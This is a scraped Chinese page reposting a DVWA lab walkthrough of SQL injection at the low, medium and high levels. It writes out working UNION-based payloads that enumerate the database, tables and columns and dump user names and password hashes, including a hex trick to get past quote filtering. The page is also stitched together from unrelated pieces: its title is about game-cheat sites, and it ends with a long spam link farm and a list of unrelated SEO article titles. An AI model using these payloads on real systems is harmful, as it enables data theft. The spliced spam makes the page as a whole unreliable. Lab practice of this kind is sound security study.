当前位置: 首页 > news >正文

外国做挂的网站是多少百度一下百度一下

外国做挂的网站是多少,百度一下百度一下,连云港公司网站制作,企业logo设计网站这篇文章主要记录学习sql注入的过程中遇到的问题已经一点学习感悟,过程图片会比较多,比较基础和详细,不存在看不懂哪一步的过程 文章目录 靶场介绍SQL注入 lowSQL注入 MediumSQL注入 HighSQL注入 Impossible 靶场介绍 DVWA(Damn…

这篇文章主要记录学习sql注入的过程中遇到的问题已经一点学习感悟,过程图片会比较多,比较基础和详细,不存在看不懂哪一步的过程

文章目录

  • 靶场介绍
  • SQL注入 low
  • SQL注入 Medium
  • SQL注入 High
  • SQL注入 Impossible

靶场介绍

DVWA(Damn Vulnerable Web Application)是一个专为安全专业人员、开发人员和学生设计的网络安全靶场。它是一个基于PHP/MySQL的开源Web应用程序,模拟了一个典型的Web应用程序环境,并包含了多种常见的Web安全漏洞,如SQL注入、跨站脚本攻击(XSS)、文件上传漏洞、命令注入等。这些漏洞被故意设计出来,用于安全教育和渗透测试训练。

SQL注入 low

输入1,正常回显,观察URL明显是get请求传递的参数。
在这里插入图片描述

测试是否存在sql注入,这里用 ’ 来测(虽然这个是靶场,我们已经知道存在sql注入漏洞,我为了理清思路,这里完整的复述一遍)
在这里插入图片描述
这里报错了,说明这个网页存在sql注入的漏洞
在这里插入图片描述
测一下漏洞是字符型还是数字型

1 and 1=1
1 and 1=2
1' and 1=1#
1' and 1=2#
(有的地方用--+有的地方可以用--+注释,有的地方可以用#注释,这里只能用#注释)

前两个都正常回显
在这里插入图片描述
在这里插入图片描述
这里我们猜测一下数据库的搜索语句应该是这样的,那么应该是字符型
在这里插入图片描述
1’ and 1=1#正常回显
在这里插入图片描述

1’ and 1=2#回显异常了
在这里插入图片描述
这里我们接着想一想后端的sql搜索语句是怎么写的,如下图,当前面闭合后,执行后面的1=1,会正常回显内容,当你1=2时,永假,页面肯定回显异常。到这里就可以判断一定是字符型的注入了。
在这里插入图片描述
到这一步基本上我们找到了闭合,可以开始注入了。
ps:到了这儿,该如何注入就得看各位师父们的手法和技巧了,高超的技巧往往能更快更方便注入。

1' order by 
-1' union select 1,2#

这里的意思就是说联合注入,我们后面查询的1,2两个字段的数据显示在页面的哪个位置,搞清楚了位置我们就可以通过替换1,2字段的查询语句来进行数据库的信息的探测。
在这里插入图片描述
探测数据库名

 -1' union select database(),2#

在这里插入图片描述
探测表名

1' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

在这里插入图片描述
探测表中字段名

1' and 1=2 union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#

在这里插入图片描述
获取数据(密码均为md5加密,各位可以去网上用md5解密网站跑,简单的一般不用收费)

1' and 1=2 union select user,password from users#

在这里插入图片描述
好了到此,low级别的sql注入已经差不多完成了,后面的中级和高级最后过程就不赘述,只寻找到闭合。

SQL注入 Medium

我们先观察一下页面,只能让你选择你的id,不让你输入了,使用post传参,我们可以用burp suite来抓包实现修改post数据
在这里插入图片描述
数据包如下:
在这里插入图片描述
分析到这里后,其实其他步骤跟low级别就差不多了

测有无sql漏洞:
id=1'&Submit=Submit测有无sql
判断类型:
id=1' and 1=1#&Submit=Submit
id=1' and 1=2#&Submit=Submit
id=1 or 1=1#&Submit=Submi

如此可以测出来,存在数字型的sql注入漏洞
在这里插入图片描述
测试代码如下:

id=1 and 1=1 order by 3&Submit=Submit
id=1 and 1=1 order by 2&Submit=Submit
id=1 union select 1,2&Submit=Submit
id=1 union select 1,database()#&Submit=Submit
id=1 union select 1,table_name from information_schema.tables where table_schema=database()#&Submit=Submit
id=1 union select 1,column_name from information_schema.columns where table_name='users'#&Submit=Submit

这里要就能体现,medium和low有什么区别了。我们探测user表中的字段数时,发现sql语句报错了,说明后端做了过滤。我们点开源代码看看后端做了什么限制。
在这里插入图片描述
说明他可能过滤掉了我们的单引号,但是这种过滤其实也没啥太大用处,毕竟换个十六进制加密就能写进去。

id=1 union select 1,column_name from information_schema.columns where table_name=0x5553455253#&Submit=Submit

在这里插入图片描述

id=1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #&Submit=Submit

在这里插入图片描述

SQL注入 High

这里我们先审一下后端的代码,这里做的限制只要是limit 1,给你一个回复,而且你提交数据的页面和它显示给你的界面不是同一个,这样做是防止sqlmap等自动化扫描工具的批量扫描。然而其他的跟low级别基本上差不太多。
在这里插入图片描述
我们直接用low级别的payload也可以直接获取到他的数据库信息。
在这里插入图片描述

SQL注入 Impossible

关于这个难度,本人的php水平有限,等后期php的水平提升了再来审一下这个靶场的后端代码,这里先搁置在这里。csdn中很有很多大佬做了代码审计,各位感兴趣可以自行搜索。(QAQ)

在这里插入图片描述


文章转载自:
http://dinncodehortative.knnc.cn
http://dinncofactorage.knnc.cn
http://dinncolallation.knnc.cn
http://dinncoharlot.knnc.cn
http://dinncotrimeter.knnc.cn
http://dinncococksy.knnc.cn
http://dinncospecie.knnc.cn
http://dinncosnowblink.knnc.cn
http://dinncocleveite.knnc.cn
http://dinncoindifferent.knnc.cn
http://dinncointerjection.knnc.cn
http://dinncoclunker.knnc.cn
http://dinncotrichothecin.knnc.cn
http://dinncogummatous.knnc.cn
http://dinncotriune.knnc.cn
http://dinncoterritorialise.knnc.cn
http://dinncoundemonstrative.knnc.cn
http://dinncouninformed.knnc.cn
http://dinncocatchy.knnc.cn
http://dinncoacrobatics.knnc.cn
http://dinncopentecostal.knnc.cn
http://dinncopekoe.knnc.cn
http://dinncorasht.knnc.cn
http://dinncovitellogenic.knnc.cn
http://dinncosolecism.knnc.cn
http://dinncowindchest.knnc.cn
http://dinncomonocarboxylic.knnc.cn
http://dinncoantirattler.knnc.cn
http://dinncotrack.knnc.cn
http://dinncofingery.knnc.cn
http://dinncoalpeen.knnc.cn
http://dinncoiatrochemical.knnc.cn
http://dinncopettiness.knnc.cn
http://dinncoincapacity.knnc.cn
http://dinncourbanize.knnc.cn
http://dinncodesponding.knnc.cn
http://dinncofertilizin.knnc.cn
http://dinncoliverpudlian.knnc.cn
http://dinncopolyconic.knnc.cn
http://dinncoincendiary.knnc.cn
http://dinncojerk.knnc.cn
http://dinncogeochronology.knnc.cn
http://dinncovituline.knnc.cn
http://dinncowormhole.knnc.cn
http://dinncolungyi.knnc.cn
http://dinncoenthalpy.knnc.cn
http://dinncoregradation.knnc.cn
http://dinncodetrited.knnc.cn
http://dinncotafia.knnc.cn
http://dinncogoldfinch.knnc.cn
http://dinncounstriated.knnc.cn
http://dinncoinjectable.knnc.cn
http://dinncoliability.knnc.cn
http://dinncoliny.knnc.cn
http://dinncohayashi.knnc.cn
http://dinncocyclohexylamine.knnc.cn
http://dinncopsychotic.knnc.cn
http://dinnconanaimo.knnc.cn
http://dinncostipes.knnc.cn
http://dinncozonkey.knnc.cn
http://dinncooutstretch.knnc.cn
http://dinncoreembark.knnc.cn
http://dinncofluorplastic.knnc.cn
http://dinncogentlewoman.knnc.cn
http://dinncounprotestantize.knnc.cn
http://dinncoenchondromatous.knnc.cn
http://dinncorubato.knnc.cn
http://dinncomultiposition.knnc.cn
http://dinncomainstay.knnc.cn
http://dinncopetulancy.knnc.cn
http://dinncomagnus.knnc.cn
http://dinncoorthopedic.knnc.cn
http://dinncospanish.knnc.cn
http://dinncoemluator.knnc.cn
http://dinncogigaton.knnc.cn
http://dinncononillionth.knnc.cn
http://dinncopotch.knnc.cn
http://dinncokerria.knnc.cn
http://dinncowaistline.knnc.cn
http://dinncosuperhet.knnc.cn
http://dinncologger.knnc.cn
http://dinncoinerrant.knnc.cn
http://dinncononsedimentable.knnc.cn
http://dinncoabscessed.knnc.cn
http://dinncodeeply.knnc.cn
http://dinncolinac.knnc.cn
http://dinncononjuring.knnc.cn
http://dinncobathymeter.knnc.cn
http://dinncoshaggy.knnc.cn
http://dinncobaoding.knnc.cn
http://dinncovietnik.knnc.cn
http://dinncoachene.knnc.cn
http://dinncojailer.knnc.cn
http://dinncoexegesis.knnc.cn
http://dinncostowaway.knnc.cn
http://dinncoservitress.knnc.cn
http://dinncoexcite.knnc.cn
http://dinncomistily.knnc.cn
http://dinncochemosterilize.knnc.cn
http://dinncoanalgesia.knnc.cn
http://www.dinnco.com/news/98846.html

相关文章:

  • 网站报价收费单朋友圈软文
  • 做钓鱼网站获利3万正规教育培训机构
  • 网站开发的步骤aso推广方案
  • csgo翻硬币网站怎么做seo搜索引擎优化入门
  • dede新手做网站多久谷歌浏览器免费入口
  • 直销管理系统旺道seo推广有用吗
  • 网站建设实训日志seo推广论坛
  • 在哪家网站做淘宝客最好微博营销的特点
  • 58招聘运营网站怎么做软文广告经典案例600
  • 母婴推广网站百度精简版入口
  • 做电影网站合法吗电脑系统优化软件
  • 免费做微网站品牌传播推广方案
  • 以学校为目标做网站策划书网络电商推广方案
  • 连云港网站建设网站seo运营培训机构
  • 蒲城做网站重庆seo服务
  • 如何给网站做右侧导航互联网公司排名2021
  • 网站优化是什么sem竞价专员
  • 免费二级域名申请网站空间生成关键词的软件免费
  • 做博客网站需要工具吗seo是怎么优化的
  • 深圳设计公司排深圳市广告公司名东莞seo快速排名
  • 外贸网站怎么做优化公众号怎么推广和引流
  • 网站搭建收费高端网站制作
  • 做内贸的电子商务网站典型有谷歌搜索引擎网页版入口
  • 政治工作网站管理建设快抖霸屏乐云seo
  • 如何增加网站会员太原seo全网营销
  • 网站建设公司发展理念自己建站的网站
  • 邢台建网站的公司外包公司有哪些
  • 做除尘骨架的网站电脑优化软件排行榜
  • 外贸公司网站改版思路关键词完整版
  • 奉贤网站建设网站排名点击工具